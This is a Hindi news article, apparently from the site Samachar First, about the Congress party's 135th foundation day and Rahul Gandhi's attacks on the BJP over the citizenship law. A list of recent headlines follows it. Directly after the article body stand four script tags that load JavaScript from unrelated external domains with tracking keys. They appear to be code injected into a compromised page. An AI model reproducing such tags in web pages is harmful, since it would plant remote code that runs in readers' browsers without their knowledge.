Categories: इंडिया

कांग्रेस आज मना रही 135वां स्थापना दिवस

<p>28 दिसंबर यानि आज कांग्रेस अपना 135वां स्थापना दिवस मना रही है। भारत की सबसे पुरानी राजनीतिक पार्टी कांग्रेस को पूरे 135 साल हो चुके हैं। इस मौके पर कांग्रेस मुख्यालय में कांग्रेस अध्यक्ष सोनिया गांधी ने पार्टी कार्यालय में ध्वज फहराकर स्थापना दिवस कार्यक्रम की शुरूआत की। इस मौके पर पार्टी मुख्यालय में जगह-जगह पर झंडे को फहराए गए। स्थापना दिवस के मौके पर कांग्रेस नेता राहुल गांधी ने भारतीय जनता पार्टी पर जमकर कर निशाना साधा। उन्होंने कहा कि ये सरकार बेरोजगारी-अर्थव्यवस्था से ध्यान भटकाने की कोशिश कर रही है।</p>

<p>राहुल गांधी ने बीजेपी पर झूठ बोलने का आरोप लगाते हुए कहा कि मैंने एक वीडियो ट्वीट किया हौ कि जिसमें नरेंद्र मोदी कह रहे हैं कि भारत में कोई डिटेंशन सेंटर नहीं हैं और एक ही वीडियो में एक डिटेंशन सेंटर दिख रहा है। इसलिए आप तय करें कि कौन झूठ बोल रहा है। इस मौके पर आज दिनभर कांग्रेस नागरिकता संशोधन कानून के खिलाफ उग्र विरोध प्रदर्शन करेगी। कांग्रेस अपने &#39;संविधान बचाओ, भारत बचाओ&#39; संदेश को लोगों तक पहुंचाने के लिए स्थापना दिवस पर देश भर में मार्च निकाली गई।</p>

<p>राहुल गांधी असम के गुवाहाटी में एक रैली को संबोधित कर रहे हैं। जहां वह नागरिकता को लेकर नरेंद्र मोदी सरकार को निशाने पर लेंगे। इसके अलावा कांग्रेस महासचिव प्रियंका गांधी वाड्रा उत्तर प्रदेश प्रदेश कांग्रेस समिति की बैठक में लखनऊ में पार्टी कार्यकर्ताओं को संबोधित करेंगी।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1577512600041″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

कुलगाम में आतंकवादियों से मुठभेड़, चार सुरक्षाकर्मी और एक यातायात अधिकारी घायल

कुलगाम में आतंकवादियों से हुई मुठभेड़ में चार सुरक्षाकर्मी व एक यातायात पुलिस अधिकारी घायल…

10 mins ago

नही थम रहा मस्जिद विवाद, देवभूमि संघर्ष समिति की फ‍िर हुंकार, प्रदेश भर में प्रदर्शन

  Shimla:कथित अवैध मस्जिदों और मजारों के निर्माण पर रोक की मांग को लेकर देवभूमि…

32 mins ago

हिमाचल विश्वविद्यालय में हादसा: हॉस्टल की 5वीं मंजिल से गिरकर छात्र की मौत

  Shimla: शुक्रवार देर रात हिमाचल प्रदेश विश्वविद्यालय में एसबीएस हॉस्टल में छात्र के गिरने…

57 mins ago

बड़ा प्रशासनिक फेरबदल: 12 एसडीएम समेत 29 एचएस अधिकारियों के तबादले

  Shimla: हिमाचल में बड़ा प्रशासनिक फेरबदल हुआ है।  कांग्रेस की सुक्‍खू  सरकार ने 12…

1 hour ago

माता श्री चिंतपूर्णी महोत्सव के लिए एक करोड़, मंदिर में बड़ी एलईडी स्क्रीन से होंगे मां के दर्शन: बाली

  आरएस बाली ने की दूसरी सांस्कृतिक सन्ध्या की अध्यक्षता श्री चिंतपूर्णी मंदिर में बड़ी…

2 hours ago

गोबिंद सागर में पहली बार, गोवा स्टाइल क्रूज का रोमांच

  Bilaspur:प्रदेश में आने वाले पर्यटक अब पहाड़ों के बीच गोबिंद सागर झील में गोवा…

15 hours ago